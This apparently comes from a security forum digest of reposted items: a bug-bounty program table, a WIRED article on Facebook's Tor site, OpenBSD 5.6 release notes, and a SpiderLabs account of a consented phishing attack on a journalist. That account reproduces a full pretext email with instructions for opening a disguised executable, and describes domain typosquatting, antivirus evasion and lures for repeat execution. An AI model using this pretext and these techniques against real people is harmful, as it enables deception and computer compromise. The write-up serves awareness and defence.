swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Twitter [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Typo3 [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Uber [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Unitag [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] UPC [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Valve Software [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] VCE [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Venmo [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Viadeo [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Vodafone (Netherlands) [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Volcanic Pixels [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Volusion [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] VSR [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Wamba [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Webconverger [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward swag] [TD] Websecurify [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] WHMCS [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Windthorst ISD [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] X.commerce [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Xen [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Xmarks [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] XMind [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Yahoo [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Yandex [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Yesware [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] YouTube [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Zencash [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] Zendesk [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Zetetic [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Ziggo [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Zimbra [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Zynga [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes[/TD] [/TR] [/TABLE] Sursa: https://bugcrowd.com/list-of-bug-bounty-programs

Why Facebook Just Launched Its Own ‘Dark Web’ Site By Andy Greenberg 10.31.14 | 12:31 pm | Facebook has never had much of a reputation for letting users hide their identities online. But now the world’s least anonymous website has just joined the Web’s most anonymous network. In a first-of-its-kind move for a Silicon Valley giant, Facebook on Friday launched a Tor hidden service, a version of its website that runs the anonymity software Tor. That new site, which can only be accessed by users running the Tor software, bounces users’ connections through three extra encrypted hops to random computers around the Internet, making it far harder for any network spy observing that traffic to trace their origin. Inviting users to connect to Facebook over Tor may seem like a strange move; given that Facebook still requires you to log in and doesn’t allow pseudonyms (in most cases), even Tor users on the site are hardly anonymous to Facebook itself. But even so, Tor users on Facebook can now protect their identities from every other online snoop that would want to unmask them. “No, you’re not anonymous to Facebook when you log in, but this provides a huge benefit for users who want security and privacy,” says Runa Sandvik, a former Tor developer who Facebook credits with advising the project in a blog post. “You get around the censorship and local adversarial surveillance, and it adds another layer of security on top of your connection.” Tor, after all, doesn’t just let users hide their identities from the sites they visit, anonymously buying drugs on the Silk Road or uploading leaked documents to news sites through the leak platform SecureDrop. It’s also designed to circumvent censorship and surveillance that occurs much closer to the user’s own connection, such as in repressive regimes like Iran or China. And since Facebook uses SSL encryption, no surveillance system watching either Facebook’s connection or the user’s local traffic should be able to match up a user’s identity with their Facebook activity. “You get around the censorship and local adversarial surveillance, and it adds another layer of security on top of your connection.” Until now, Facebook has made it difficult for users to access its site over Tor, sometimes even blocking their connections. Because Tor users appear to log in from unusual IP addresses all over the world, they often trigger the site’s safeguards against botnets, collections of hijacked computers typically used by hackers to attack sites. Facebook security engineer Alec Muffett Doc Searls / Flickr “Tor challenges some assumptions of Facebook’s security mechanisms—for example its design means that from the perspective of our systems a person who appears to be connecting from Australia at one moment may the next appear to be in Sweden or Canada,” writes Facebook security engineer Alec Muffett. “Considerations like these have not always been reflected in Facebook’s security infrastructure, which has sometimes led to unnecessary hurdles for people who connect to Facebook using Tor.” Facebook’s Tor site is designed to be friendlier to those far-flung connections. And Sandvik says it also provides an extra layer of security than running Tor on the user’s end alone can provide. Tor users are often warned about malicious “exit nodes”, the final computer bouncing their traffic around the Internet. Such exit nodes can sometimes be used to spy on their unencrypted traffic or in some cases, even strip that encryption away. When both the user and Facebook are running Tor, however, the traffic doesn’t leave the Tor network until it’s safely within Facebook’s infrastructure. Over the past few years, sites like Google, Facebook, Twitter, and Google have all implemented default SSL encryption to protect users’ traffic. Sandvik sees Facebook’s Tor hidden service as a sign that Tor may be the next basic privacy protection Silicon Valley companies will be expected to offer their users. “I would be really excited to see other tech companies that want to do the same,” she says. “And I’d love to help them.” Sursa: Why Facebook Just Launched Its Own 'Dark Web' Site | WIRED

Hacking a Reporter: UK Edition Over the summer, a U.K. journalist asked the Trustwave SpiderLabs team to target her with an online attack. You might remember that we did the same in 2013 by setting our sites on a U.S.-based reporter. This scenario, however, would differ from the first. The reporter, Sophie, was our only target. Co-workers, company or family were off limits. Sophie wrote about the experience from her perspective here. Below, we’ll tell the story from the perspective of Trustwave SpiderLabs, playing the role of “theoretical” attacker. Online, some readers criticized Sophie for being too naïve when it came to the attack. There could be some truth to that, but we would say that with great pretext a well-executed attack rarely fails, no matter the target (and zero-days are rarely required). We’re not saying this out of pride or to take it easy on Sophie. It’s just our experience. To hedge against the risk of failure, we proposed a two-to-three stage attack. We described the first stage as a demonstration of passive information gathering and later stages only as "more active". At a high level, we approached the project as follows: Stages of activity Passive information gathering/reconnaissance Active fingerprinting Active attack First, we performed reconnaissance on Sophie and identified her potential cellphone model, her corporate e-mail address, some of her social network profiles and much more. This was a good starting point, but to increase the chance of success its helps greatly to know what operating system the target uses and fingerprint her system(s) as much as possible. Fingerprinting: First Attempt In our first attempt to fingerprint her, we created a Gmail account using a fake, Latin name (we’ll explain why later). From that account, we sent a few e-mails to Sophie asking whether we could meet her. We included a hidden image in an attempt to fingerprint her system when it loaded the image. The e-mail was purposefully vague about the details of any in-person meet because people tend to be curious, and we expected Sophie to reply asking for more details and consequently open additional attack vectors. We never received a response or a proper fingerprint because Gmail prevented it as Google image’s proxy downloaded the images. Fingerprinting: Second Attempt As part of our second fingerprinting attempt, we registered a domain that resembled the Linkedin domain—“linkedhn.com.” We sent an e-mail to Sophie that mimicked the one sent by Linkedin when a user invites you to connect. We sent the e-mail masquerading as a supposed colleague of Sophie’s. If she chose to confirm the connection, the message would lead Sophie to the login page for our cloned Linkedin website. Sophie opened our counterfeit invite but did not log in. We were, however, able to fingerprint the target system using the BeEF framework. We enumerated her plugins, OS version, location, and much more. In short, we identified that Windows 7 with Java 1.7 update 51 and Microsoft Office 2010 were in use. We then quickly lost our browser hook and no further attacks were launched. Although seemingly small, this first victory was important. Blind attacks—when not launched against massive groups of potential targets—are unlikely to succeed against a single individual. Below you see some of the system information we were able to gather. After allowing some time to elapse, we revived our fake gmail account that used a Latin name. We used it to introduce ourselves and lend more credibility to our subsequent pretext. We created a new account called "UK.Leaks.Team@gmail.com" and sent the following, fictitious e-mail to our target three days before Brazil’s presidential election. Sophie, We are part of a Worldwide activist group and write to you again as one of our local collaborators tried to contact you a few weeks ago using the alias Ricardo Almeida to protect his identify, but unfortunately you haven’t replied. We want to talk to you because we have obtained confidential files from the UK government and are currently working with newspapers from different countries. At the time of writing we already have agreements with national newspapers from the USA, Germany, Italy, France, Brazil, Argentina and South Africa. The document in reference must be released on October 3rd, 2014; two days before the Brazilian Election Day. … We would like to invite The [REDACTED] to be a primary channel for public disclosure of this document and attach a partial extract for your initial review. If you agree to publish an article in accordance with our coordinated global release date of October 3rd, we will send the full document and related files for your review. Please be aware we are a not-for-profit group and our identities must remain private to protect individuals involved. Viewing Instructions?? The attached file is compressed and encrypted with a strong password "![REDACTED]Curtis7482" (without quotes), in order to reduce the file size and increase the security of our communication. If you are using Windows you may need to copy the attached .rar file outside Outlook to be able to open it since the file is encrypted, as follows: You will need a tool to extract .rar files, for example Winrar, 7Z, etc. The steps below are based on Winrar. Copy the attached file to your "Documents” folder. On the "Documents” folder, right click on "UK Leaks Proof – [REDACTED].rar", choose "extract here" and insert the password. A new file will be created called "UK Leak #12 - BR Voting System.pdf", which can be double clicked to open. We hope you find the extract enlightening and are waiting for your answer. Sincerely. UK Leaks Team? The contents of this message are confidential and may be privileged. Copying or disclosing is prohibited. Guess what? She opened the e-mail and followed the instructions. Originally she hesitated, but it seems her appetite for a scoop overwhelmed her reluctance. Put yourself in her place. She is a journalist for a big newspaper, and she’s contacted by a supposed anonymous leaker with ground-breaking news about electoral fraud. What would you do? You probably wouldn’t let security best practice get in the way of a potential exclusive! Maybe you’d think twice, but you might also put faith in your antivirus program and have a look at the attachment. Here’s the e-mail displayed on her computer: Her use of the Webmail interface caught our attention. Later, we discovered that she seemed to be using a different computer as the fingerprint in this case differed from the original. We used an old trick to impersonate the binary and make it look like a valid PDF file. Because Gmail prohibits sending a direct executable, usually we hide it inside a .zip file. Gmail also blocked the .zip file and so in the end we were forced to use something less common. We chose to use a .rar file and adapt the pretext to it. We hypothesized that since Sophie was a technology journalist, she might already have Winrar installed. Below is how the fake PDF file appeared to Sophie on her computer once she followed the instructions: It looks like a genuine attachment, right? A clue that reveals something might be amiss is its description as “application” in the “type” column. Many people might ignore it, but it’s worth checking that description to avoid such social engineering hacks. Another feature we added was that every time the fake PDF was opened, it paused for a few seconds and displayed a pop-up message stating “Access was denied.” We hoped this might lead to her double-clicking the file again or trying to open it using another computer. It worked! As a result we got 6 different connections and shells from her laptop. We packed the executable with a private packer that at the time had a very low rate of detection. The payload is a variation of the 3 in 1 described in this blog post. At one point she replied to our e-mail agreeing to the release date and saying she planned to open the file immediately. As you’ll see below, warnings from security software on her system raised her suspicions. But in spite of her reservations: the pressure of the release date, the potential for a scoop that could affect her career in a positive way, and her confidence in her security software led to the compromise of her system. After her original reply, it took her another 25 minutes to execute the file. We think this might have been a symptom of her trepidation. We delayed our response to let the pressure and phony urgency work its magic. Once she sent her second response expressing her concerns that it was a scam, it was too late—she was already compromised. But, had this particular attack failed, her asking us for proof gave us a second chance to try another attack vector had we needed it. We think she may be thinking to herself, "Did I just do something I shouldn't have?!" As we showed you earlier, Sophie was using the Gmail web interface with Chrome. She also had OpenOffice, which is less common. The computer was not running with elevated privileges, but as you know, there are ways to escalate privileges even on a fully patched computer (but that’s a topic for another blog post). Once we established command and control on her system, there isn’t anything we couldn't have done. We did consider one of the most interesting avenues to be piggy-backing onto the corporate VPN connection, stealing credentials, and then exploring the file-shares and other resources used by Sophie and potentially her colleagues. The sky was the limit. What can we take away from this? Organizations should consider the following: Raise awareness and educate employees on the potential perils of social engineering attacks. Review gaps in perimeter anti-malware defenses (particularly e-mail and web gateways). If security gateway technology is already in place, be sure it’s configured to be effective and that it’s tested. Regular patching and updating of systems and software is not just for servers. Patching end-user systems and software should be a structured, on-going activity. Understand that the compromise of a user laptop can lead to pivoted attacks against the internal corporate network, even if the compromised user is working from home. For example, attackers could pivot through any corporate VPN connections that are, or will be, established by that remote user. As a footnote to this post it’s worth mentioning that often we get asked, “what’s the point of social engineering, you’re always going to get in”. To be fair, that is a pretty accurate statement. The value of social engineering engagements comes partly from testing resilience, but more so more from raising employee awareness of what is possible when they are targeted. Posted by SpiderLabs Anterior on 28 October 2014 Sursa: Hacking a Reporter: UK Edition - SpiderLabs Anterior

[h=2]OpenBSD 5.6[/h] Released Nov 1, 2014 Copyright 1997-2014, Theo de Raadt. ISBN 978-0-9881561-4-2 5.6 Song: "Ride of the Valkyries" Order a CDROM from our ordering system. See the information on the FTP page for a list of mirror machines. Go to the pub/OpenBSD/5.6/ directory on one of the mirror sites. Have a look at the 5.6 errata page for a list of bugs and workarounds. See a detailed log of changes between the 5.5 and 5.6 releases. signify(1) pubkeys for this release: base: RWR0EANmo9nqhpPbPUZDIBcRtrVcRwQxZ8UKGWY8Ui4RHi229KFL84wV fw: RWT4e3jpYgSeLYs62aDsUkcvHR7+so5S/Fz/++B859j61rfNVcQTRxMw pkg: RWSPEf7Vpp2j0PTDG+eLs5L700nlqBFzEcSmHuv3ypVUEOYwso+UucXb All applicable copyrights and credits can be found in the applicable file sources found in the files src.tar.gz, sys.tar.gz, xenocara.tar.gz, or in the files fetched via ports.tar.gz. The distribution files used to build packages from the ports.tar.gz file are not included on the CDROM because of lack of space. [h=3]What's New[/h] This is a partial list of new features and systems included in OpenBSD 5.6. For a comprehensive list, see the changelog leading to 5.6. LibreSSL This release forks OpenSSL into LibreSSL, a version of the TLS/crypto stack with goals of modernizing the codebase, improving security, and applying best practice development processes. No support for legacy MacOS, Netware, OS/2, VMS and Windows platforms, as well as antique compilers. Removal of the IBM 4758, Broadcom ubsec, Sureware, Nuron, GOST, GMP, CSwift, CHIL, CAPI, Atalla and AEP engines, either because the hardware is irrelevant, or because they require external non-free libraries to work. No support for FIPS-140 compliance. No EBCDIC support. No support for big-endian i386 and amd64 platforms. Use standard routines from the C library (malloc, strdup, snprintf...) instead of rolling our own, sometimes badly. Remove the old OpenSSL PRNG, and rely upon arc4random_buf from libc for all the entropy needs. Remove the MD2 and SEED algorithms. Remove J-PAKE, PSK and SRP (mis)features. Aggressive cleaning of BN memory when no longer used. No support for Kerberos. No support for SSLv2. No support for the questionable DTLS heartbeat extension. No support for TLS compression. No support for US-Export SSL ciphers. Do not use the current time as a random seed in libssl. Support for ChaCha and Poly1305 algorithm. Support for Brainpool and ANSSI elliptic curves. Support for AES-GCM and ChaCha20-Poly1305 AEAD modes. [*]Improved hardware support, including: SCSI Multipathing support via mpath(4) and associated path drivers on several architectures. New qlw(4) driver for QLogic ISP SCSI HBAs. New qla(4) driver for QLogic ISP2100/2200/2300 Fibre Channel HBAs. New upd(4) sensor driver for USB Power Devices (UPS). New brswphy(4) driver for Broadcom BCM53xx 10/100/1000TX Ethernet PHYs. New uscom(4) driver for simple USB serial adapters. New axen(4) driver for ASIX Electronics AX88179 10/100/Gigabit USB Ethernet devices. The inteldrm(4) and radeondrm(4) drivers have improved suspend/resume support. The userland interface for the agp(4) driver has been removed. The rtsx(4) driver now supports card readers based on the RTS5227 and RTL8402 chipsets. The firmware for the run(4) driver has been updated to version 0.33. The run(4) driver now supports devices based on the RT3900E chipset. The zyd(4) driver, which was broken for some time, has been fixed. The bwi(4) driver now works in systems with more than 1GB of RAM. The re(4) driver now supports devices based on the RTL8168EP/8111EP, RTL8168G/8111G, and RTL8168GU/8111GU chipsets. [*]Generic network stack improvements: divert(4) now supports checksum offload. IPv6 is now turned off on new interfaces by default. Assigning an IPv6 address will enable IPv6 on an interface. Support for RFC4620 IPv6 Node Information Queries has been removed. The kernel no longer supports the SO_DONTROUTE socket option. The getaddrinfo(3) function now supports the AI_ADDRCONFIG flag defined in RFC 3493. Include router alert option (RAO) in IGMP packets, as required by RFC2236. ALTQ has been removed. The hash table for Protocol Control Block (PCB) of TCP and UDP now resize automatically on load. [*]Installer improvements: Remove ftp and tape as install methods. Preserve the disklabel (and next 6 blocks) when installing boot block on 4k-sector disk drives. Change the "Server?" question to "HTTP Server?" to allow unambiguous autoinstall(8) handling. Allow autoinstall(8) to fetch and install sets from multiple locations. Many sample configuration files have moved from /etc to /etc/examples. [*]Routing daemons and other userland network improvements: When used with the -v flag, tcpdump(8) now shows the actual bad checksum within the IP/protocol header itself and what the good checksum should be. ftp(1) now allows its User-Agent to be changed via the -U command-line option. The -r option of ping(8) and traceroute(8) has been removed. ifconfig(8) can now explicitly assign an IPv6 link-local address and turn IPv6 autoconf on or off. ifconfig(8) has been made smarter about parsing WEP keys on the command line. ifconfig(8) scan now shows the encryption type of wireless networks (WEP, WPA, WPA2, 802.1x). MS-CHAPv1 (RFC2433) support has been removed from pppd(8). traceroute6(8) has been merged into traceroute(8). The asr API for asynchronous address resolution and nameserver querying is now public. pflow(4)'s pflowproto 9 has been removed. The userland ppp(8) daemon and its associated PPPoE helper, pppoe(8), have been removed. snmpd(8), snmpctl(8), and relayd(8) now communicate via the AgentX protocol. relayd(8) has a new filtering subsystem, where the new configuration language uses last-matching pf-like rules. The new relayd(8) filter rules now support URL-based relaying. relayd(8) now uses privilege separation for private keys. This acts as an additional mitigation to prevent leakage of the private keys from the processes doing SSL/TLS. New httpd(8) HTTP server with FastCGI and SSL support. [*]OpenSMTPD 5.4.3 (includes changes to 5.4.2): New/changed features: OpenSMTPD replaces Sendmail as the default MTA. Queue process now runs under a different user for better isolation. Merged MDA, MTA and SMTP processes into a single unprivileged process. Killed the MFA process, it is no longer needed. Added support for email addresses lookups in the table_db backend. Added RSA privilege separation support to prevent possible private key leakage. [*]The following significant bugs have been fixed in this release: Minor bug fixes in some corner cases of the routing logic. The enqueuer no longer adds its own User-Agent. Disabled profiling code, allowing all processes to rest rather than waking up every second. Reworked the purge task to avoid disk-hits unless necessary... only once at startup. Fix various header parsing bugs in the local enqueuer. Assorted minor fixes and code cleanups. [*]Security improvements: Changed the heuristics of the stack protector to also protect functions with local array definitions and references to local frame addresses. This matches the -fstack-protector-strong option of upstream GCC. Position-independent executables (PIE) are now used by default on powerpc. Removed Kerberos. Default bcrypt hash type is now $2b$. Remove md5crypt support. Improved easier to use bcrypt API is now available. Increase randomness of random mmap mappings. Added getentropy(2). Added timingsafe_memcmp(3). Removed the MD4 hash algorithm and functions from cksum(1), S/Key, and libc. gets(3) has been removed. Added reallocarray(3), which allows multiple sized objects to be allocated without the cost of clearing memory while avoiding possible integer overflows. Extended fread(3) and fwrite(3) to check for integer overflows. [*]Assorted improvements: locate databases for both base and xenocara, as /usr/lib/locate/src.db and /usr/X11R6/lib/locate/xorg.db. Much faster package updates, due to package contents reordering that precludes re-downloading unchanged files. Fix many programs that failed when accessing disks having sector sizes other than 512 bytes, including badsect(8), df(1), dump(8), dumpfs(8), fsck_ext2fs(8), fsck_ffs(8), fsdb(8), growfs(8), ncheck_ffs(8), quotacheck(8), tunefs(8). Constrain MSDOS timestamps to 1/1/1980 through 12/31/2107. 64-bit time_t values outside that range are stored as 1/1/1980. bs(6) now prints a battleship splash screen. rcp, rsh, rshd, rwho, rwhod, ruptime, asa, bdes, fpr, mkstr, page, spray, xstr, oldrdist, fsplit, uyap, and bluetooth have been removed. rmail(8) and uucpd(8) have been removed from the base system and added to the ports tree. Lynx has been removed from the base system and added to the ports tree. TCP Wrappers have been removed. Fix atexit(3) recursive handlers. Enhance disklabel(8) to recover filesystem mountpoint information when reading saved ascii labels. Properly handle msgbuf_write(3) EOF conditions, including uses in tmux(1), dvmrpd(8), ldapd(8), ldpd(8), ospf6d(8), ospfd(8), relayd(8), ripd(8), smtpd(8), ypldap(8). Constrain fdisk(8) '-l' to disk sizes of 64 blocks or more. Sync fdisk(8) built-in MBR with current /usr/mdec/mbr. Quiet dhclient(8) '-q' even more. Log less redundant dhclient(8) info. New leases, lease renewals, cable state changes more obvious to applications monitoring dhclient(8) files. Preserve chronological order of leases in the dhclient.leases(5) leases files. Use 'lease {}' statements in dhclient.conf(5), allowing interfaces to get an address when no dynamic lease is available. Improve dhclient(8) parsing and printing of classess static routes. Eliminate unnecessary rewrites of resolv.conf(5) by dhclient(8). Added sendsyslog(2): syslog(3) now works even when out of file descriptors or in a chroot. Added errc(3), verrc(3), warnc(3) and vwarnc(3). Faster hibernate/unhibernate performance on amd64 and i386 platforms. Support hibernating to softraid(4) crypto volumes. Improved performance of seekdir(3) to start of current buffer. Added <endian.h> per the revision of the POSIX spec in progress. Apache has been removed. Read support for ext4 filesystems. Reworked mplocks as ticket locks instead of spinlocks on amd64, i386, and sparc64. This provides fairer access to the kernel lock between logical CPUs, especially in multi socket systems. [*]OpenSSH 6.7 Potentially-incompatible changes: sshd(8): The default set of ciphers and MACs has been altered to remove unsafe algorithms. In particular, CBC ciphers and arcfour* are disabled by default. sshd(8): Support for tcpwrappers/libwrap has been removed. OpenSSH 6.5 and 6.6 have a bug that causes ~0.2% of connections using the "curve25519-sha256@libssh.org" KEX exchange method to fail when connecting with something that implements the specification correctly. OpenSSH 6.7 disables this KEX method when speaking to one of the affected versions. [*]New/changed features: Major internal refactoring to begin to make part of OpenSSH usable as a library. So far the wire parsing, key handling and KRL code has been refactored. Please note that we do not consider the API stable yet, nor do we offer the library in separable form. ssh(1), sshd(8): Add support for Unix domain socket forwarding. A remote TCP port may be forwarded to a local Unix domain socket and vice versa or both ends may be a Unix domain socket. ssh(1), ssh-keygen(1): Add support for SSHFP DNS records for Ed25519 key types. sftp(1): Allow resumption of interrupted uploads. ssh(1): When rekeying, skip file/DNS lookups of the hostkey if it is the same as the one sent during initial key exchange. (bz#2154) sshd(8): Allow explicit ::1 and 127.0.0.1 forwarding bind addresses when GatewayPorts=no; allows client to choose address family. (bz#2222) sshd(8): Add a sshd_config(5) PermitUserRC option to control whether ~/.ssh/rc is executed, mirroring the no-user-rc authorized_keys option. (bz#2160) ssh(1): Add a %C escape sequence for LocalCommand and ControlPath that expands to a unique identifer based on a hash of the tuple of (local host, remote user, hostname, port). Helps avoid exceeding miserly pathname limits for Unix domain sockets in multiplexing control paths. (bz#2220) sshd(8): Make the "Too many authentication failures" message include the user, source address, port and protocol in a format similar to the authentication success/failure messages. (bz#2199) Added unit and fuzz tests for refactored code. [*]The following significant bugs have been fixed in this release: sshd(8): Fix remote forwarding with same listen port but different listen address. ssh(1): Fix inverted test that caused PKCS#11 keys that were explicitly listed in ssh_config(5) or on the commandline not to be preferred. ssh-keygen(1): Fix bug in KRL generation: multiple consecutive revoked certificate serial number ranges could be serialised to an invalid format. Readers of a broken KRL caused by this bug will fail closed, so no should-have-been-revoked key will be accepted. ssh(1): Reflect stdio-forward ("ssh -W host:port ...") failures in exit status. Previously we were always returning 0. (bz#2255) ssh(1), ssh-keygen(1): Make Ed25519 keys' title fit properly in the randomart border. (bz#2247) ssh-agent(1): Only cleanup agent socket in the main agent process and not in any subprocesses it may have started (e.g. forked askpass). Fixes agent sockets being zapped when askpass processes fatal(). (bz#2236) ssh-add(1): Make stdout line-buffered; saves partial output getting lost when ssh-add(1) fatal()s part-way through (e.g. when listing keys from an agent that supports key types that ssh-add(1) doesn't). (bz#2234) ssh-keygen(1): When hashing or removing hosts, don't choke on "@revoked" markers and don't remove "@cert-authority" markers. (bz#2241) ssh(1): Don't fatal when hostname canonicalisation fails and a ProxyCommand is in use; continue and allow the ProxyCommand to connect anyway (e.g. to a host with a name outside the DNS behind a bastion). scp(1): When copying local->remote fails during read, don't send uninitialised heap to the remote end. sftp(1): Fix fatal "el_insertstr failed" errors when tab-completing filenames with a single quote char somewhere in the string. (bz#2238) ssh-keyscan(1): Scan for Ed25519 keys by default. ssh(1): When using VerifyHostKeyDNS with a DNSSEC resolver, down-convert any certificate keys to plain keys and attempt SSHFP resolution. Prevents a server from skipping SSHFP lookup and forcing a new-hostkey dialog by offering only certificate keys. sshd(8): Avoid crash at exit via NULL pointer reference. (bz#2225) Fix some strict-alignment errors. [*]mandoc 1.13.0: New implementation of apropos(1), whatis(1), and makewhatis(8) based on SQLite3 databases. Substantial improvements of mandoc(1) error and warning messages. Almost complete implementation of roff(7) numerical expressions. About a dozen minor new features and numerous bug fixes. [*]Ports and packages: Over 8,800 ports. [*]Many pre-built packages for each architecture: [TABLE=width: 95%] [TR] [TD=width: 25%] i386: 8588 sparc64: 7965 alpha: 6278 sh: 2626 [/TD] [TD=width: 25%] amd64: 8588 powerpc: 8049 m88k: 2475 sparc: 3394 [/TD] [TD=width: 25%] arm: 5633 hppa: 6143 vax: 1995 [/TD] [TD=width: 25%] mips64: 4686 mips64el: 6697 [/TD] [/TR] [/TABLE] [*]Some highlights: GNOME 3.12.2 KDE 3.5.10 KDE 4.13.3 Xfce 4.10 MySQL 5.1.73 PostgreSQL 9.3.4 Postfix 2.11.1 OpenLDAP 2.3.43 and 2.4.39 Mozilla Firefox 31.0 Mozilla Thunderbird 31.0 GHC 7.6.3 LibreOffice 4.1.6.2 Emacs 21.4 and 24.3 Vim 7.4.135 PHP 5.3.28, 5.4.30 and 5.5.14 Python 2.7.8, 3.3.5 and 3.4.1 Ruby 1.8.7.374, 1.9.3.545, 2.0.0.481 and 2.1.2 Tcl/Tk 8.5.15 and 8.6.1 JDK 1.6.0.32 and 1.7.0.55 Mono 3.4.0 Chromium 36.0.1985.125 Groff 1.22.2 Go 1.3 GCC 4.6.4, 4.8.3 and 4.9.0 LLVM/Clang 3.5 (20140228) Node.js 0.10.28 [*]As usual, steady improvements in manual pages and other documentation. [*]The system includes the following major components from outside suppliers: Xenocara (based on X.Org 7.7 with xserver 1.15.2 + patches, freetype 2.5.3, fontconfig 2.11.1, Mesa 10.2.3, xterm 309, xkeyboard-config 2.11 and more) Gcc 4.2.1 (+ patches) and 3.3.6 (+ patches) Perl 5.18.2 (+ patches) Nginx 1.6.0 (+ patches) SQLite 3.8.4.3 (+ patches) Sendmail 8.14.8, with libmilter Bind 9.4.2-P2 (+ patches) NSD 4.0.3 Unbound 1.4.22 Sudo 1.7.2p8 Ncurses 5.7 Binutils 2.15 (+ patches) Gdb 6.3 (+ patches) Less 458 (+ patches) Awk Aug 10, 2011 version [h=3]How to install[/h] Following this are the instructions which you would have on a piece of paper if you had purchased a CDROM set instead of doing an alternate form of install. The instructions for doing an FTP (or other style of) install are very similar; the CDROM instructions are left intact so that you can see how much easier it would have been if you had purchased a CDROM instead. Sursa: OpenBSD 5.6

